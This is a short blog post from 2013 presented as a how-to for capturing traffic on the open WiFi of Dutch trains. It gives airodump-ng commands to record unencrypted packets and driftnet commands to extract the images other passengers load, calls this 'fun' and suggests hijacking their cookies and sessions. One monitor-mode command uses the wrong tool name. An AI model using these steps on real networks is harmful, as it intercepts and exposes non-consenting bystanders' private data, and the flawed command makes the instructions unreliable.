Capture WiFi traffic on Linux

posted on 2013-03-01

Some of the public trains in the Netherlands have free WiFi. To create a connection with the hotspot, there is a simple open network you connect to. You then agree to the terms and you can start using it.

Because the WiFi is an open network, all packets going in and out fly through the air without any encryption. This makes any client that does not use any kind of protocol encryption, burst their data online, including any cookies and session information they might share over HTTP (not HTTPS ofcourse). Theoretically you could join somebodies online game or mimic them by having the browser access everything they access (I would love to see a Selenium implementation for this!).

Let's have some simple fun by capturing all the packets using aircrack-ng and then extracting all the images we can find using driftnet. First we set up monitoring on our wireless device:

sudo airodump-ng start wlan0

As you can see, my wireless device is wlan0, you can find out yours by using iwconfig and picking the device that has a wireless extension.

The output of airodump-ng start will tell you which device it has set up for monitoring (usually mon0, again you can check with iwconfig). You should now be able to capture packets from it using sudo airodump-ng --write captured mon0. But because we are only interested in packets some of the packets, let's narrow our capture.

First find out the channel, so we don't have to hop channels. Run sudo iwlist scan|less and pick the channel you are interested in (--channel 1). Also we only need pcap output for Wireshark and driftnet (--output-format pcap). And we only find unencrypted stuff interesting (--encrypt OPN).

This sums up to:

sudo airodump-ng --encrypt OPN --output-format pcap -a --channel 1 --write captured mon0

We should now have a file called captured-01.cap (--write captured). You can analyze all packets by opening the file in Wireshark. But there is another fun thing you can try: extract all images you can find using driftnet.

mkdir images
driftnet -f captured-01.cap -d images -a

This will tell drifnet to use the capture file (-f), dump any found images in the images directory (-d) and leave the whole GUI out of it.

You could also run driftnet on your monitoring interface mon0 directly, but make sure you are prepared for what might pop up on your screen.

Happy hacking!